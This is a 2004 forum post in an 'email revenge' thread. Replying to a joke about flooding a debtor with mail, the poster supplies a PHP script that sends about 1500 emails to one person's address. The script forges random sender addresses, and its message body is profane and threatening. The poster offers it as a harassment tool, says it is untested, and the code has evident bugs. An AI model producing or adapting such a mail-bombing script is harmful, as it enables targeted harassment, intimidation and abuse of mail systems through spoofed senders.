Thread: email revenge
View Single Post
Old 10-18-2004, 05:25 PM   #8 (permalink)
Herk
Insane
 
Herk's Avatar
 
Location: Kansas City, MO
Quote:
Originally Posted by kebo
Jus thinking outloud here......if someone legitimately owes you money, is it considered spamming if you simply ask him for it........1000 times a day?
Also is it illeagle to have a 500kB signature file that accompanies each email?
Also is it illeagle to have 50 different email address each with a 500kB signature file to request payment from 1000 times daily?
just a thought.
kevin
This is good stuff. I think you are right. You could have a php script do this.
I threw this together. Don't know if it is exactly what you want, but hey, it might be fun to play with. And it randomized the from addresses.
PHP Code:
<?
function spam_mail($to, $subject, $message, $mailnum) {
  global $numon;
$message2 = "
<html>
<head>
<title>".$subject."</title>
</head>
<body>
<p>
".$message."
</p>
</body>
</html>
";
  $headers  = "MIME-Version: 1.0\r\n";
  $headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
  $headers .= "From: ThePersonWhoWantsYourMoney <".$from.">\r\n";
  if (empty($to)) {
    return;
  } else {
    for ($i = 1; $i <= $mailnum; $i++) {
      srand(microtime() * 1000000000000);
      for($i2 = 0; $i2 < 2; $i2++) {
        $from_rnd = array_merge(range('a','z'), range('A','Z'), range(0,9));
        $rnd = array_rand($from_rnd, 5);
        $from_temp[$i2] = "";
        for($i3=0;$i3<=4;$i3++){
          $from_temp[$i2] .= $from_rnd[$rnd[$i3]];
        }
      }
      $from = $from_temp[0]."@".$from_temp[1].".com";
      $subject = $numon."-".$i;
      mail($to, $subject, $message2, $headers);
    }
  }
}

$message = "
Hello Mother Fucker,<br>
<br>
Give me my money you no good piece of shit. If you don't I'll (insert random bad things here)<br>
<br>
Your New Biggest Enemy,<br>
Me
";

$sendsperscript = 50;
$repeatnum = 30;
if (!isset($numon)) {
  $numon = 1;
} else {
  $numon = $_GET["numon"];
}

spam_mail("thatpunk@his-email.com", "", $message, $sendsperscript);

if ($numon < $repeatnum) {
  $numon++;
  header ("location:".$PHP_SELF."?numon=".$numon."");
}

?>
This would send 1500 emails to the same address, all from 1500 randomized different return addresses. lol
At least, it should. I haven't tested it.

Herk
__________________
-Blind faith runs into things!-
Herk is offline  
 

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54